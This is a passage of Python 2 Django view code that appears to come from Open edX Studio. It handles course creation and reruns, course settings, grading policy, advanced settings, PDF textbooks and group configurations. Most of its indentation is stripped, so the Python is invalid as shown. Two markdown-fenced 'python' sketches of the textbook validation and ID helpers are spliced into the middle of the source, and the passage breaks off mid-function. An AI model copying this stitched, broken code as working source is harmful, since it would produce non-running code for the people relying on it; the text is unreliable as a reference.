    # Set a unique wiki_slug for newly created courses. To maintain active wiki_slugs for
    # existing xml courses this cannot be changed in CourseDescriptor.
    # TODO get rid of defining wiki slug in this org/course/run specific way and reconcile
    # w/ xmodule.course_module.CourseDescriptor.__init__
wiki_slug = u"{0}.{1}.{2}".format(org, number, run)
definition_data = {'wiki_slug': wiki_slug}
fields.update(definition_data)
with modulestore().default_store(store):
# Creating the course raises DuplicateCourseError if an existing course with this org/name is found
new_course = modulestore().create_course(
org,
number,
run,
user.id,
fields=fields,
)
# Make sure user has instructor and staff access to the new course
add_instructor(new_course.id, user, user)
# Initialize permissions for user in the new course
initialize_permissions(new_course.id, user)
return new_course
def _rerun_course(request, org, number, run, fields):
"""
Reruns an existing course.
Returns the URL for the course listing page.
"""
source_course_key = CourseKey.from_string(request.json.get('source_course_key'))
# verify user has access to the original course
if not has_studio_write_access(request.user, source_course_key):
raise PermissionDenied()
# create destination course key
store = modulestore()
with store.default_store('split'):
destination_course_key = store.make_course_key(org, number, run)
# verify org course and run don't already exist
if store.has_course(destination_course_key, ignore_case=True):
raise DuplicateCourseError(source_course_key, destination_course_key)
# Make sure user has instructor and staff access to the destination course
# so the user can see the updated status for that course
add_instructor(destination_course_key, request.user, request.user)
# Mark the action as initiated
CourseRerunState.objects.initiated(source_course_key, destination_course_key, request.user, fields['display_name'])
# Rerun the course as a new celery task
json_fields = json.dumps(fields, cls=EdxJSONEncoder)
rerun_course.delay(unicode(source_course_key), unicode(destination_course_key), request.user.id, json_fields)
# Return course listing page
return JsonResponse({
'url': reverse_url('course_handler'),
'destination_course_key': unicode(destination_course_key)
})
# pylint: disable=unused-argument
@login_required
@ensure_csrf_cookie
@require_http_methods(["GET"])
def course_info_handler(request, course_key_string):
"""
GET
html: return html for editing the course info handouts and updates.
"""
course_key = CourseKey.from_string(course_key_string)
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user)
if 'text/html' in request.META.get('HTTP_ACCEPT', 'text/html'):
return render_to_response(
'course_info.html',
{
'context_course': course_module,
'updates_url': reverse_course_url('course_info_update_handler', course_key),
'handouts_locator': course_key.make_usage_key('course_info', 'handouts'),
'base_asset_url': StaticContent.get_base_url_path_for_course_assets(course_module.id)
}
)
else:
return HttpResponseBadRequest("Only supports html requests")
# pylint: disable=unused-argument
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT", "DELETE"))
@expect_json
def course_info_update_handler(request, course_key_string, provided_id=None):
"""
restful CRUD operations on course_info updates.
    provided_id should be None if it's new (create) and an index otherwise.
GET
json: return the course info update models
POST
json: create an update
PUT or DELETE
json: change an existing update
"""
if 'application/json' not in request.META.get('HTTP_ACCEPT', 'application/json'):
return HttpResponseBadRequest("Only supports json requests")
course_key = CourseKey.from_string(course_key_string)
usage_key = course_key.make_usage_key('course_info', 'updates')
if provided_id == '':
provided_id = None
# check that logged in user has permissions to this item (GET shouldn't require this level?)
if not has_studio_write_access(request.user, usage_key.course_key):
raise PermissionDenied()
if request.method == 'GET':
course_updates = get_course_updates(usage_key, provided_id, request.user.id)
if isinstance(course_updates, dict) and course_updates.get('error'):
return JsonResponse(course_updates, course_updates.get('status', 400))
else:
return JsonResponse(course_updates)
elif request.method == 'DELETE':
try:
return JsonResponse(delete_course_update(usage_key, request.json, provided_id, request.user))
        except Exception:
return HttpResponseBadRequest(
"Failed to delete",
content_type="text/plain"
)
    # POST or PUT: django sometimes rewrites one to the other, so treat them the same
elif request.method in ('POST', 'PUT'):
try:
return JsonResponse(update_course_updates(usage_key, request.json, provided_id, request.user))
        except Exception:
return HttpResponseBadRequest(
"Failed to save",
content_type="text/plain"
)
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "PUT", "POST"))
@expect_json
def settings_handler(request, course_key_string):
"""
Course settings for dates and about pages
GET
html: get the page
json: get the CourseDetails model
PUT
json: update the Course and About xblocks through the CourseDetails model
"""
course_key = CourseKey.from_string(course_key_string)
prerequisite_course_enabled = settings.FEATURES.get('ENABLE_PREREQUISITE_COURSES', False)
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user)
if 'text/html' in request.META.get('HTTP_ACCEPT', '') and request.method == 'GET':
upload_asset_url = reverse_course_url('assets_handler', course_key)
# see if the ORG of this course can be attributed to a 'Microsite'. In that case, the
# course about page should be editable in Studio
about_page_editable = not microsite.get_value_for_org(
course_module.location.org,
'ENABLE_MKTG_SITE',
settings.FEATURES.get('ENABLE_MKTG_SITE', False)
)
short_description_editable = settings.FEATURES.get('EDITABLE_SHORT_DESCRIPTION', True)
settings_context = {
'context_course': course_module,
'course_locator': course_key,
'lms_link_for_about_page': utils.get_lms_link_for_about_page(course_key),
'course_image_url': utils.course_image_url(course_module),
'details_url': reverse_course_url('settings_handler', course_key),
'about_page_editable': about_page_editable,
'short_description_editable': short_description_editable,
'upload_asset_url': upload_asset_url,
'course_handler_url': reverse_course_url('course_handler', course_key),
}
if prerequisite_course_enabled:
courses, in_process_course_actions = get_courses_accessible_to_user(request)
# exclude current course from the list of available courses
courses = [course for course in courses if course.id != course_key]
if courses:
courses = _remove_in_process_courses(courses, in_process_course_actions)
settings_context.update({'possible_pre_requisite_courses': courses})
return render_to_response('settings.html', settings_context)
elif 'application/json' in request.META.get('HTTP_ACCEPT', ''):
if request.method == 'GET':
course_details = CourseDetails.fetch(course_key)
return JsonResponse(
course_details,
# encoder serializes dates, old locations, and instances
encoder=CourseSettingsEncoder
)
# For every other possible method type submitted by the caller...
else:
# if pre-requisite course feature is enabled set pre-requisite course
if prerequisite_course_enabled:
prerequisite_course_keys = request.json.get('pre_requisite_courses', [])
if prerequisite_course_keys:
if not all(is_valid_course_key(course_key) for course_key in prerequisite_course_keys):
return JsonResponseBadRequest({"error": _("Invalid prerequisite course key")})
set_prerequisite_courses(course_key, prerequisite_course_keys)
# If the entrance exams feature has been enabled, we'll need to check for some
# feature-specific settings and handle them accordingly
# We have to be careful that we're only executing the following logic if we actually
# need to create or delete an entrance exam from the specified course
if settings.FEATURES.get('ENTRANCE_EXAMS', False):
course_entrance_exam_present = course_module.entrance_exam_enabled
entrance_exam_enabled = request.json.get('entrance_exam_enabled', '') == 'true'
ee_min_score_pct = request.json.get('entrance_exam_minimum_score_pct', None)
# If the entrance exam box on the settings screen has been checked...
if entrance_exam_enabled:
# Load the default minimum score threshold from settings, then try to override it
entrance_exam_minimum_score_pct = float(settings.ENTRANCE_EXAM_MIN_SCORE_PCT)
if ee_min_score_pct:
entrance_exam_minimum_score_pct = float(ee_min_score_pct)
if entrance_exam_minimum_score_pct.is_integer():
entrance_exam_minimum_score_pct = entrance_exam_minimum_score_pct / 100
entrance_exam_minimum_score_pct = unicode(entrance_exam_minimum_score_pct)
# If there's already an entrance exam defined, we'll update the existing one
if course_entrance_exam_present:
exam_data = {
'entrance_exam_minimum_score_pct': entrance_exam_minimum_score_pct
}
update_entrance_exam(request, course_key, exam_data)
# If there's no entrance exam defined, we'll create a new one
else:
create_entrance_exam(request, course_key, entrance_exam_minimum_score_pct)
# If the entrance exam box on the settings screen has been unchecked,
# and the course has an entrance exam attached...
elif not entrance_exam_enabled and course_entrance_exam_present:
delete_entrance_exam(request, course_key)
# Perform the normal update workflow for the CourseDetails model
return JsonResponse(
CourseDetails.update_from_json(course_key, request.json, request.user),
encoder=CourseSettingsEncoder
)
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT", "DELETE"))
@expect_json
def grading_handler(request, course_key_string, grader_index=None):
"""
Course Grading policy configuration
GET
html: get the page
json no grader_index: get the CourseGrading model (graceperiod, cutoffs, and graders)
json w/ grader_index: get the specific grader
PUT
json no grader_index: update the Course through the CourseGrading model
json w/ grader_index: create or update the specific grader (create if index out of range)
"""
course_key = CourseKey.from_string(course_key_string)
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user)
if 'text/html' in request.META.get('HTTP_ACCEPT', '') and request.method == 'GET':
course_details = CourseGradingModel.fetch(course_key)
return render_to_response('settings_graders.html', {
'context_course': course_module,
'course_locator': course_key,
'course_details': json.dumps(course_details, cls=CourseSettingsEncoder),
'grading_url': reverse_course_url('grading_handler', course_key),
})
elif 'application/json' in request.META.get('HTTP_ACCEPT', ''):
if request.method == 'GET':
if grader_index is None:
return JsonResponse(
CourseGradingModel.fetch(course_key),
# encoder serializes dates, old locations, and instances
encoder=CourseSettingsEncoder
)
else:
return JsonResponse(CourseGradingModel.fetch_grader(course_key, grader_index))
elif request.method in ('POST', 'PUT'): # post or put, doesn't matter.
# None implies update the whole model (cutoffs, graceperiod, and graders) not a specific grader
if grader_index is None:
return JsonResponse(
CourseGradingModel.update_from_json(course_key, request.json, request.user),
encoder=CourseSettingsEncoder
)
else:
return JsonResponse(
CourseGradingModel.update_grader_from_json(course_key, request.json, request.user)
)
elif request.method == "DELETE" and grader_index is not None:
CourseGradingModel.delete_grader(course_key, grader_index, request.user)
return JsonResponse()
# pylint: disable=invalid-name
def _add_tab(request, tab_type, course_module):
"""
Adds tab to the course.
"""
# Add tab to the course if needed
changed, new_tabs = add_extra_panel_tab(tab_type, course_module)
# If a tab has been added to the course, then send the
# metadata along to CourseMetadata.update_from_json
if changed:
course_module.tabs = new_tabs
request.json.update({'tabs': {'value': new_tabs}})
# Indicate that tabs should not be filtered out of
# the metadata
return True
return False
# pylint: disable=invalid-name
def _remove_tab(request, tab_type, course_module):
"""
Removes the tab from the course.
"""
changed, new_tabs = remove_extra_panel_tab(tab_type, course_module)
if changed:
course_module.tabs = new_tabs
request.json.update({'tabs': {'value': new_tabs}})
return True
return False
def is_advanced_component_present(request, advanced_components):
    """
    Return True when one of `advanced_components` is present in the request.

    Raises TypeError when the value stored under ADVANCED_COMPONENT_POLICY_KEY
    in request.json is malformed (not iterable).
    """
    if ADVANCED_COMPONENT_POLICY_KEY not in request.json:
        return False
    new_advanced_component_list = request.json[ADVANCED_COMPONENT_POLICY_KEY]['value']
    for ac_type in advanced_components:
        if ac_type in new_advanced_component_list and ac_type in ADVANCED_COMPONENT_TYPES:
            return True
    return False
def is_field_value_true(request, field_list):
"""
Return True when one of field values is set to True by request
"""
    return any(request.json.get(field, {}).get('value') for field in field_list)
# pylint: disable=invalid-name
def _modify_tabs_to_components(request, course_module):
"""
Automatically adds/removes tabs if user indicated that they want
respective modules enabled in the course
Return True when tab configuration has been modified.
"""
tab_component_map = {
# 'tab_type': (check_function, list_of_checked_components_or_values),
# open ended tab by combinedopendended or peergrading module
'open_ended': (is_advanced_component_present, OPEN_ENDED_COMPONENT_TYPES),
# notes tab
'notes': (is_advanced_component_present, NOTE_COMPONENT_TYPES),
# student notes tab
'edxnotes': (is_field_value_true, ['edxnotes'])
}
tabs_changed = False
    for tab_type, (check, component_types) in tab_component_map.items():
try:
tab_enabled = check(request, component_types)
        except TypeError:
            # the user supplied a non-iterable value for the advanced component
            # list; return immediately and let validation report the error.
            return False
        if tab_enabled:
            # check passed, some of these component_types are present; add the tab
if _add_tab(request, tab_type, course_module):
# tab indeed was added, the change needs to propagate
tabs_changed = True
else:
# the tab should not be present (anymore)
if _remove_tab(request, tab_type, course_module):
# tab indeed was removed, the change needs to propagate
tabs_changed = True
return tabs_changed
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT"))
@expect_json
def advanced_settings_handler(request, course_key_string):
"""
Course settings configuration
GET
html: get the page
json: get the model
PUT, POST
json: update the Course's settings. The payload is a json rep of the
metadata dicts.
"""
course_key = CourseKey.from_string(course_key_string)
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user)
if 'text/html' in request.META.get('HTTP_ACCEPT', '') and request.method == 'GET':
return render_to_response('settings_advanced.html', {
'context_course': course_module,
'advanced_dict': json.dumps(CourseMetadata.fetch(course_module)),
'advanced_settings_url': reverse_course_url('advanced_settings_handler', course_key)
})
elif 'application/json' in request.META.get('HTTP_ACCEPT', ''):
if request.method == 'GET':
return JsonResponse(CourseMetadata.fetch(course_module))
else:
try:
# do not process tabs unless they were modified according to course metadata
filter_tabs = not _modify_tabs_to_components(request, course_module)
# validate data formats and update
is_valid, errors, updated_data = CourseMetadata.validate_and_update_from_json(
course_module,
request.json,
filter_tabs=filter_tabs,
user=request.user,
)
if is_valid:
return JsonResponse(updated_data)
else:
return JsonResponseBadRequest(errors)
# Handle all errors that validation doesn't catch
except (TypeError, ValueError) as err:
return HttpResponseBadRequest(
django.utils.html.escape(err.message),
content_type="text/plain"
)
class TextbookValidationError(Exception):
    """
    An error raised when a textbook input is invalid.
    """
    pass
def validate_textbooks_json(text):
    """
    Validate the given text as representing a list of PDF textbooks.
    """
try:
textbooks = json.loads(text)
except ValueError:
raise TextbookValidationError("invalid JSON")
if not isinstance(textbooks, (list, tuple)):
raise TextbookValidationError("must be JSON list")
for textbook in textbooks:
validate_textbook_json(textbook)
# check specified IDs for uniqueness
all_ids = [textbook["id"] for textbook in textbooks if "id" in textbook]
unique_ids = set(all_ids)
if len(all_ids) > len(unique_ids):
raise TextbookValidationError("IDs must be unique")
return textbooks
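# A stdlib-only sketch of the list-level validation above. The per-textbook
# validate_textbook_json step is elided so the example stays self-contained,
# which means only the shape and duplicate-ID checks are exercised here.

```python
import json

class TextbookValidationError(Exception):
    """Raised when textbook input is invalid."""

def validate_textbooks_json(text):
    try:
        textbooks = json.loads(text)
    except ValueError:
        raise TextbookValidationError("invalid JSON")
    if not isinstance(textbooks, (list, tuple)):
        raise TextbookValidationError("must be JSON list")
    # specified IDs must be unique across the whole list
    all_ids = [textbook["id"] for textbook in textbooks if "id" in textbook]
    if len(all_ids) > len(set(all_ids)):
        raise TextbookValidationError("IDs must be unique")
    return textbooks

print(len(validate_textbooks_json('[{"id": "1", "tab_title": "A"}]')))  # 1
```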
def validate_textbook_json(textbook):
    """
    Validate the given value as representing a single PDF textbook.
    """
if isinstance(textbook, basestring):
try:
textbook = json.loads(textbook)
except ValueError:
raise TextbookValidationError("invalid JSON")
if not isinstance(textbook, dict):
raise TextbookValidationError("must be JSON object")
if not textbook.get("tab_title"):
raise TextbookValidationError("must have tab_title")
tid = unicode(textbook.get("id", ""))
if tid and not tid[0].isdigit():
raise TextbookValidationError("textbook ID must start with a digit")
return textbook
def assign_textbook_id(textbook, used_ids=()):
"""
Return an ID that can be assigned to a textbook
and doesn't match the used_ids
"""
tid = Location.clean(textbook["tab_title"])
if not tid[0].isdigit():
# stick a random digit in front
tid = random.choice(string.digits) + tid
while tid in used_ids:
# add a random ASCII character to the end
tid = tid + random.choice(string.ascii_lowercase)
return tid
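# assign_textbook_id depends on Location.clean to slugify the tab title; the
# sketch below substitutes a simple regex cleaner (an assumption for
# illustration — the real helper has its own cleaning rules) to show the
# prepend-digit / append-letter disambiguation on its own.

```python
import random
import re
import string

def clean(title):
    """Stand-in for Location.clean: replace anything outside [a-zA-Z0-9_]."""
    return re.sub(r'[^a-zA-Z0-9_]', '_', title)

def assign_textbook_id(textbook, used_ids=()):
    tid = clean(textbook["tab_title"])
    if not tid[0].isdigit():
        # IDs must start with a digit, so stick a random one in front
        tid = random.choice(string.digits) + tid
    while tid in used_ids:
        # disambiguate by appending random lowercase letters
        tid = tid + random.choice(string.ascii_lowercase)
    return tid

tid = assign_textbook_id({"tab_title": "My Book"}, used_ids=set())
print(tid)  # e.g. '3My_Book' - always starts with a digit
```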
@require_http_methods(("GET", "POST", "PUT"))
@login_required
@ensure_csrf_cookie
def textbooks_list_handler(request, course_key_string):
"""
A RESTful handler for textbook collections.
GET
html: return textbook list page (Backbone application)
json: return JSON representation of all textbooks in this course
POST
json: create a new textbook for this course
PUT
json: overwrite all textbooks in the course with the given list
"""
course_key = CourseKey.from_string(course_key_string)
store = modulestore()
with store.bulk_operations(course_key):
course = get_course_and_check_access(course_key, request.user)
if "application/json" not in request.META.get('HTTP_ACCEPT', 'text/html'):
# return HTML page
upload_asset_url = reverse_course_url('assets_handler', course_key)
textbook_url = reverse_course_url('textbooks_list_handler', course_key)
return render_to_response('textbooks.html', {
'context_course': course,
'textbooks': course.pdf_textbooks,
'upload_asset_url': upload_asset_url,
'textbook_url': textbook_url,
})
# from here on down, we know the client has requested JSON
if request.method == 'GET':
return JsonResponse(course.pdf_textbooks)
elif request.method == 'PUT':
try:
textbooks = validate_textbooks_json(request.body)
except TextbookValidationError as err:
return JsonResponse({"error": err.message}, status=400)
tids = set(t["id"] for t in textbooks if "id" in t)
for textbook in textbooks:
if "id" not in textbook:
tid = assign_textbook_id(textbook, tids)
textbook["id"] = tid
tids.add(tid)
if not any(tab['type'] == PDFTextbookTabs.type for tab in course.tabs):
course.tabs.append(PDFTextbookTabs())
course.pdf_textbooks = textbooks
store.update_item(course, request.user.id)
return JsonResponse(course.pdf_textbooks)
elif request.method == 'POST':
# create a new textbook for the course
try:
textbook = validate_textbook_json(request.body)
except TextbookValidationError as err:
return JsonResponse({"error": err.message}, status=400)
if not textbook.get("id"):
tids = set(t["id"] for t in course.pdf_textbooks if "id" in t)
textbook["id"] = assign_textbook_id(textbook, tids)
existing = course.pdf_textbooks
existing.append(textbook)
course.pdf_textbooks = existing
if not any(tab['type'] == PDFTextbookTabs.type for tab in course.tabs):
course.tabs.append(PDFTextbookTabs())
store.update_item(course, request.user.id)
resp = JsonResponse(textbook, status=201)
resp["Location"] = reverse_course_url(
'textbooks_detail_handler',
course.id,
kwargs={'textbook_id': textbook["id"]}
)
return resp
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT", "DELETE"))
def textbooks_detail_handler(request, course_key_string, textbook_id):
"""
JSON API endpoint for manipulating a textbook via its internal ID.
Used by the Backbone application.
GET
json: return JSON representation of textbook
POST or PUT
json: update textbook based on provided information
DELETE
json: remove textbook
"""
course_key = CourseKey.from_string(course_key_string)
store = modulestore()
with store.bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user)
matching_id = [tb for tb in course_module.pdf_textbooks
if unicode(tb.get("id")) == unicode(textbook_id)]
if matching_id:
textbook = matching_id[0]
else:
textbook = None
if request.method == 'GET':
if not textbook:
return JsonResponse(status=404)
return JsonResponse(textbook)
        elif request.method in ('POST', 'PUT'):
            # POST and PUT are treated identically; django sometimes rewrites one to the other
try:
new_textbook = validate_textbook_json(request.body)
except TextbookValidationError as err:
return JsonResponse({"error": err.message}, status=400)
new_textbook["id"] = textbook_id
if textbook:
i = course_module.pdf_textbooks.index(textbook)
new_textbooks = course_module.pdf_textbooks[0:i]
new_textbooks.append(new_textbook)
new_textbooks.extend(course_module.pdf_textbooks[i + 1:])
course_module.pdf_textbooks = new_textbooks
else:
course_module.pdf_textbooks.append(new_textbook)
store.update_item(course_module, request.user.id)
return JsonResponse(new_textbook, status=201)
elif request.method == 'DELETE':
if not textbook:
return JsonResponse(status=404)
i = course_module.pdf_textbooks.index(textbook)
remaining_textbooks = course_module.pdf_textbooks[0:i]
remaining_textbooks.extend(course_module.pdf_textbooks[i + 1:])
course_module.pdf_textbooks = remaining_textbooks
store.update_item(course_module, request.user.id)
return JsonResponse()
class GroupConfigurationsValidationError(Exception):
"""
An error thrown when a group configurations input is invalid.
"""
pass
class GroupConfiguration(object):
"""
Prepare Group Configuration for the course.
"""
def __init__(self, json_string, course, configuration_id=None):
"""
Receive group configuration as a json (`json_string`), deserialize it
and validate.
"""
self.configuration = GroupConfiguration.parse(json_string)
self.course = course
self.assign_id(configuration_id)
self.assign_group_ids()
self.validate()
@staticmethod
def parse(json_string):
"""
Deserialize given json that represents group configuration.
"""
try:
configuration = json.loads(json_string)
except ValueError:
raise GroupConfigurationsValidationError(_("invalid JSON"))
configuration["version"] = UserPartition.VERSION
return configuration
def validate(self):
"""
Validate group configuration representation.
"""
if not self.configuration.get("name"):
raise GroupConfigurationsValidationError(_("must have name of the configuration"))
if len(self.configuration.get('groups', [])) < 1:
raise GroupConfigurationsValidationError(_("must have at least one group"))
def assign_id(self, configuration_id=None):
"""
Assign id for the json representation of group configuration.
"""
if configuration_id:
self.configuration['id'] = int(configuration_id)
else:
self.configuration['id'] = generate_int_id(
MINIMUM_GROUP_ID, MYSQL_MAX_INT, GroupConfiguration.get_used_ids(self.course)
)
def assign_group_ids(self):
"""
Assign ids for the group_configuration's groups.
"""
used_ids = [g.id for p in self.course.user_partitions for g in p.groups]
# Assign ids to every group in configuration.
for group in self.configuration.get('groups', []):
if group.get('id') is None:
group["id"] = generate_int_id(MINIMUM_GROUP_ID, MYSQL_MAX_INT, used_ids)
used_ids.append(group["id"])
@staticmethod
def get_used_ids(course):
"""
Return the set of IDs that are already in use.
"""
return set([p.id for p in course.user_partitions])
def get_user_partition(self):
"""
Get user partition for saving in course.
"""
return UserPartition.from_json(self.configuration)
@staticmethod
def _get_usage_info(course, unit, item, usage_info, group_id, scheme_name=None):
"""
Get usage info for unit/module.
"""
unit_url = reverse_usage_url(
'container_handler',
course.location.course_key.make_usage_key(unit.location.block_type, unit.location.name)
)
usage_dict = {'label': u"{} / {}".format(unit.display_name, item.display_name), 'url': unit_url}
if scheme_name == RANDOM_SCHEME:
validation_summary = item.general_validation_message()
usage_dict.update({'validation': validation_summary.to_json() if validation_summary else None})
usage_info[group_id].append(usage_dict)
return usage_info
@staticmethod
def get_content_experiment_usage_info(store, course):
"""
Get usage information for all Group Configurations currently referenced by a split_test instance.
"""
split_tests = store.get_items(course.id, qualifiers={'category': 'split_test'})
return GroupConfiguration._get_content_experiment_usage_info(store, course, split_tests)
@staticmethod
def get_split_test_partitions_with_usage(store, course):
"""
Returns json split_test group configurations updated with usage information.
"""
usage_info = GroupConfiguration.get_content_experiment_usage_info(store, course)
configurations = []
for partition in get_split_user_partitions(course.user_partitions):
configuration = partition.to_json()
configuration['usage'] = usage_info.get(partition.id, [])
configurations.append(configuration)
return configurations
@staticmethod
def _get_content_experiment_usage_info(store, course, split_tests):
"""
Returns all units names, their urls and validation messages.
Returns:
{'user_partition_id':
[
{
'label': 'Unit 1 / Experiment 1',
'url': 'url_to_unit_1',
'validation': {'message': 'a validation message', 'type': 'warning'}
},
{
'label': 'Unit 2 / Experiment 2',
'url': 'url_to_unit_2',
'validation': {'message': 'another validation message', 'type': 'error'}
}
],
}
"""
usage_info = {}
for split_test in split_tests:
if split_test.user_partition_id not in usage_info:
usage_info[split_test.user_partition_id] = []
unit = split_test.get_parent()
if not unit:
log.warning("Unable to find parent for split_test %s", split_test.location)
continue
usage_info = GroupConfiguration._get_usage_info(
course=course,
unit=unit,
item=split_test,
usage_info=usage_info,
group_id=split_test.user_partition_id,
scheme_name=RANDOM_SCHEME
)
return usage_info
@staticmethod
def get_content_groups_usage_info(store, course):
"""
Get usage information for content groups.
"""
items = store.get_items(course.id, settings={'group_access': {'$exists': True}})
return GroupConfiguration._get_content_groups_usage_info(course, items)
@staticmethod
def _get_content_groups_usage_info(course, items):
"""
Returns all units names and their urls.
Returns:
{'group_id':
[
{
'label': 'Unit 1 / Problem 1',
'url': 'url_to_unit_1'
},
{
'label': 'Unit 2 / Problem 2',
'url': 'url_to_unit_2'
}
],
}
"""
usage_info = {}
for item in items:
if hasattr(item, 'group_access') and item.group_access:
(__, group_ids), = item.group_access.items()
for group_id in group_ids:
if group_id not in usage_info:
usage_info[group_id] = []
unit = item.get_parent()
if not unit:
log.warning("Unable to find parent for component %s", item.location)
continue
usage_info = GroupConfiguration._get_usage_info(
course,
unit=unit,
item=item,
usage_info=usage_info,
group_id=group_id
)
return usage_info
@staticmethod
def update_usage_info(store, course, configuration):
"""
Update usage information for particular Group Configuration.
Returns json of particular group configuration updated with usage information.
"""
configuration_json = None
# Get all Experiments that use particular Group Configuration in course.
if configuration.scheme.name == RANDOM_SCHEME:
split_tests = store.get_items(
course.id,
category='split_test',
content={'user_partition_id': configuration.id}
)
configuration_json = configuration.to_json()
usage_information = GroupConfiguration._get_content_experiment_usage_info(store, course, split_tests)
configuration_json['usage'] = usage_information.get(configuration.id, [])
elif configuration.scheme.name == COHORT_SCHEME:
# The scheme is "cohort".
configuration_json = GroupConfiguration.update_content_group_usage_info(store, course, configuration)
return configuration_json
@staticmethod
def update_content_group_usage_info(store, course, configuration):
"""
Update usage information for particular Content Group Configuration.
Returns json of particular content group configuration updated with usage information.
"""
usage_info = GroupConfiguration.get_content_groups_usage_info(store, course)
content_group_configuration = configuration.to_json()
for group in content_group_configuration['groups']:
group['usage'] = usage_info.get(group['id'], [])
return content_group_configuration
@staticmethod
def get_or_create_content_group(store, course):
"""
Returns the first user partition from the course which uses the
CohortPartitionScheme, or generates one if no such partition is
found. The created partition is not saved to the course until
the client explicitly creates a group within the partition and
POSTs back.
"""
content_group_configuration = get_cohorted_user_partition(course.id)
if content_group_configuration is None:
content_group_configuration = UserPartition(
id=generate_int_id(MINIMUM_GROUP_ID, MYSQL_MAX_INT, GroupConfiguration.get_used_ids(course)),
name=CONTENT_GROUP_CONFIGURATION_NAME,
description=CONTENT_GROUP_CONFIGURATION_DESCRIPTION,
groups=[],
scheme_id=COHORT_SCHEME
)
return content_group_configuration.to_json()
content_group_configuration = GroupConfiguration.update_content_group_usage_info(
store,
course,
content_group_configuration
)
return content_group_configuration
def remove_content_or_experiment_group(request, store, course, configuration, group_configuration_id, group_id=None):
"""
Remove content group or experiment group configuration only if it's not in use.
"""
configuration_index = course.user_partitions.index(configuration)
if configuration.scheme.name == RANDOM_SCHEME:
usages = GroupConfiguration.get_content_experiment_usage_info(store, course)
used = int(group_configuration_id) in usages
if used:
return JsonResponse(
{"error": _("This group configuration is in use and cannot be deleted.")},
status=400
)
course.user_partitions.pop(configuration_index)
elif configuration.scheme.name == COHORT_SCHEME:
if not group_id:
return JsonResponse(status=404)
group_id = int(group_id)
usages = GroupConfiguration.get_content_groups_usage_info(store, course)
used = group_id in usages
if used:
return JsonResponse(
{"error": _("This content group is in use and cannot be deleted.")},
status=400
)
matching_groups = [group for group in configuration.groups if group.id == group_id]
if matching_groups:
group_index = configuration.groups.index(matching_groups[0])
configuration.groups.pop(group_index)
else:
return JsonResponse(status=404)
course.user_partitions[configuration_index] = configuration
store.update_item(course, request.user.id)
return JsonResponse(status=204)
@require_http_methods(("GET", "POST"))
@login_required
@ensure_csrf_cookie
def group_configurations_list_handler(request, course_key_string):
"""
A RESTful handler for Group Configurations
GET
html: return Group Configurations list page (Backbone application)
POST
json: create new group configuration
"""
course_key = CourseKey.from_string(course_key_string)
store = modulestore()
with store.bulk_operations(course_key):
course = get_course_and_check_access(course_key, request.user)
if 'text/html' in request.META.get('HTTP_ACCEPT', 'text/html'):
group_configuration_url = reverse_course_url('group_configurations_list_handler', course_key)
course_outline_url = reverse_course_url('course_handler', course_key)
should_show_experiment_groups = are_content_experiments_enabled(course)
if should_show_experiment_groups:
experiment_group_configurations = GroupConfiguration.get_split_test_partitions_with_usage(store, course)
else:
experiment_group_configurations = None
content_group_configuration = GroupConfiguration.get_or_create_content_group(store, course)
return render_to_response('group_configurations.html', {
'context_course': course,
'group_configuration_url': group_configuration_url,
'course_outline_url': course_outline_url,
'experiment_group_configurations': experiment_group_configurations,
'should_show_experiment_groups': should_show_experiment_groups,
'content_group_configuration': content_group_configuration
})
elif "application/json" in request.META.get('HTTP_ACCEPT'):
if request.method == 'POST':
# create a new group configuration for the course
try:
new_configuration = GroupConfiguration(request.body, course).get_user_partition()
except GroupConfigurationsValidationError as err:
return JsonResponse({"error": err.message}, status=400)
course.user_partitions.append(new_configuration)
response = JsonResponse(new_configuration.to_json(), status=201)
response["Location"] = reverse_course_url(
'group_configurations_detail_handler',
course.id,
kwargs={'group_configuration_id': new_configuration.id} # pylint: disable=no-member
)
store.update_item(course, request.user.id)
return response
else:
return HttpResponse(status=406)
@login_required
@ensure_csrf_cookie
@require_http_methods(("POST", "PUT", "DELETE"))
def group_configurations_detail_handler(request, course_key_string, group_configuration_id, group_id=None):
"""
JSON API endpoint for manipulating a group configuration via its internal ID.
Used by the Backbone application.
POST or PUT
json: update group configuration based on provided information
"""
course_key = CourseKey.from_string(course_key_string)
store = modulestore()
with store.bulk_operations(course_key):
course = get_course_and_check_access(course_key, request.user)
matching_id = [p for p in course.user_partitions
if unicode(p.id) == unicode(group_configuration_id)]
if matching_id:
configuration = matching_id[0]
else:
configuration = None
if request.method in ('POST', 'PUT'):  # can be either; Django sometimes rewrites one to the other
try:
new_configuration = GroupConfiguration(request.body, course, group_configuration_id).get_user_partition()
except GroupConfigurationsValidationError as err:
return JsonResponse({"error": err.message}, status=400)
if configuration:
index = course.user_partitions.index(configuration)
course.user_partitions[index] = new_configuration
else:
course.user_partitions.append(new_configuration)
store.update_item(course, request.user.id)
configuration = GroupConfiguration.update_usage_info(store, course, new_configuration)
return JsonResponse(configuration, status=201)
elif request.method == "DELETE":
if not configuration:
return JsonResponse(status=404)
return remove_content_or_experiment_group(
request=request,
store=store,
course=course,
configuration=configuration,
group_configuration_id=group_configuration_id,
group_id=group_id
)
def are_content_experiments_enabled(course):
"""
Returns True if content experiments have been enabled for the course.
"""
return (
SPLIT_TEST_COMPONENT_TYPE in ADVANCED_COMPONENT_TYPES and
SPLIT_TEST_COMPONENT_TYPE in course.advanced_modules
)
def _get_course_creator_status(user):
"""
Helper method for returning the course creator status for a particular user,
taking into account the values of DISABLE_COURSE_CREATION and ENABLE_CREATOR_GROUP.
If the user passed in has not previously visited the index page, it will be
added with status 'unrequested' if the course creator group is in use.
"""
if user.is_staff:
course_creator_status = 'granted'
elif settings.FEATURES.get('DISABLE_COURSE_CREATION', False):
course_creator_status = 'disallowed_for_this_site'
elif settings.FEATURES.get('ENABLE_CREATOR_GROUP', False):
course_creator_status = get_course_creator_status(user)
if course_creator_status is None:
# User not grandfathered in as an existing user, has not previously visited the dashboard page.
# Add the user to the course creator admin table with status 'unrequested'.
